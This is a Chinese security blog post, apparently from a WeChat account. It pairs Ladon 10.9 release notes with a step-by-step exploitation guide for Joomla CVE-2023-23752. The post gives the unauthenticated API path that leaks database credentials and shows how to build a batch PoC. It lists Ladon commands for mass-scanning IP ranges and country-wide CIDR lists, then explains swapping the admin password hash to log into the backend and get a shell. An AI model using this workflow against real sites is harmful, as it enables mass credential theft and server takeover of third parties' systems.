Ladon 10.9 20230224
[]JoomlaPwd CVE-2023-23752 未授权读取网站数据库密码(主机 邮箱 数据库 用户 密码)[]LadonExp 修复PocTag PocName处理双引号的bug[]WeblogicPoc 不再探测Banner 影响速度[]WhatCMS[]NetGearPwd IP自动转url[]MSNSwitchPwd IP自动转url[]T3Info[]whatcms 增加一些端口[]portscan 增加一些端口 更新WebBanner WebTitle
漏洞简介
Joomla!是一套全球知名的内容管理系统(CMS),其使用PHP语言加上MySQL数据库开发。2月16日,Joomla官方发布安全公告,修复了Joomla! CMS中的一个未授权访问漏洞(CVE-2023-23752),目前该漏洞的细节及PoC/EXP已公开。Joomla! CMS 版本4.0.0 - 4.2.7中访问限制不当,可能导致未授权访问Rest API,造成敏感信息泄露(如数据库账号密码等)。鉴于该漏洞影响较大,建议客户尽快做好自查及防护。
实战效果
通过漏洞读取到密码,还需看目标是否允许远程连接Mysql,默认是不允许连接的,所以实战还得靠运气,并不是说拿到密码就能造成严重后果。连接成功后,能不能RCE拿到权限,还得看MYSQL版本,读写权限等多因素影响。
影响版本
Joomla! CMS 4.0-4.2.7
-
存在未授权访问漏洞
-
开放MYSQL端口
-
可连MYSQL(无IP限制)
-
可写权限
POC
/api/index.php/v1/config/application?public=true可以看到Poc非常简单,浏览器访问即可,所以应该有很多人在乱扫了。复现也非常简单,本地phpstudy搭个joomla环境,LadonEXP添加POC
LadonExp生成DLL
添加poc后,编译生成DLL,点击测试,可以看到返回数据中包含密码
PocTag填写 "attributes":{"password" 最新版10.9才支持双引号
PocName ISVUL
再次测试即可得到Ladon专用的高效批量POC
漏洞检测
生成后的POC,通过Ladon调用,支持多种格式批量,大大提高工作效率,管理员可快速检测内网C段、外网C段相关资产是否存在漏洞,然后修复。
Ladon 192.168.1.1 LadonPoc48.dllLadon http://192.168.1.1 LadonPoc48.dll
指定IP范围扫描
Ladon 192.168.1.50-192.168.1.200 ICMP ICMP探测1段50-200的存活主机指定网段范围扫描
Ladon 192.168.1.30-192.168.50.80 ICMP ICMP探测1.30至50.80存活主机URL批量检测
相关资产引擎导出joomla的URL列表,保存为url.txt
Ladon url.txt LadonPoc48.dll内网或外网C段、B段、A段漏洞检测
相关搜索引擎搜索结果不一定全,未必收录到目标资产,内网资产就更加了,所以Ladon的批量不只局限在url.txt,格式非常丰富,只需实现POC,无论是扫内网还是外网,都可以轻轻松松批量检测。
Ladon 192.168.1.1/c LadonPoc48.dllLadon 192.168.1.1/b LadonPoc48.dllLadon 192.168.1.1/a LadonPoc48.dll
内网或外网批量C段、B段列表检测
Ladon ip24.txt LadonPoc48.dllLadon ip16.txt LadonPoc48.dll
指定国家网段检测
cidr.txt里存放,C段、B段或cidr格式IP即可
Ladon cidr.txt LadonPoc48.dll测试几万IP,存在洞的才1000,但有多少可连接Mysql未测
Ladon子模块JoomlaPwd读取密码
存在漏洞URL,返回ISVUL、主机、邮箱、数据库、用户、密码等信息
##### 199 JoomlaPwd CVE-2023-23752 未授权网站数据库密码读取Ladon 192.168.1.8/24 JoomlaPwdLadon 192.168.1.8 JoomlaPwdLadon http://192.168.1.8 JoomlaPwdLadon url.txt JoomlaPwd
注: 发布版本 已把URL和密码分开显示
扫描HTTP或HTTPS
结尾添加http或https代表传入ip强制转换为url,http对应80端口,https对应443端口,该功能仅适用于WEB相关模块,非URL参数模块不要使用
Ladon 192.168.1.8/24 JoomlaPwd 默认扫描httpLadon 192.168.1.8/24 JoomlaPwd https 所有ip转成https扫描
WhatCMS模块
WhatCMS模块默认探测常见Web端口,扫C段或B段速度较慢但结果全,如果你明确C段只开放了80和443端口,那么就没必要默认扫一堆端口
Ladon 192.168.1.8/24 WhatCMS 默认扫描常见Web端口并识别CMSLadon 192.168.1.8/24 WhatCMS https 所有ip转成http只扫描80端口Ladon 192.168.1.8/24 WhatCMS https 所有ip转成https只扫描443
如果扫描的URL较多可使用重定向输出txt结果
Ladon url.txt JoomlaPwd > joomlaPwd.txt
注: 发布版本 已把URL和密码分开显示
MysqlScan批量检测已知数据库密码
check.txt内容(主机 数据库 用户 密码),Oracle、mssql、ssh等同理
192.168.1.1 dbtest root toor10.123.1.5 joomla root 12345610.123.1.5 3306 joomla root 123456
使用以下命令检测
Ladon MysqlScanGetShell方法
检测成功的密码保存在MysqlScan.log文件中,可通过Navicat或Mysql客户端工具连接,找到joomla后台用户密码,替换Hash,登陆后台GetShell,成功后再改回原密码。其它方法,通过mysql客户端getshell,参考phpmyadmin或mysql提权,或者某些MYSQL版本可直接执行命令。
域名解析IP
若客户端不支持域名连接Mysql,则需先解析IP再进行连接
原文始发于微信公众号(K8实验室):Ladon复现Joomla! 未授权漏洞读取密码CVE-2023-23752
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论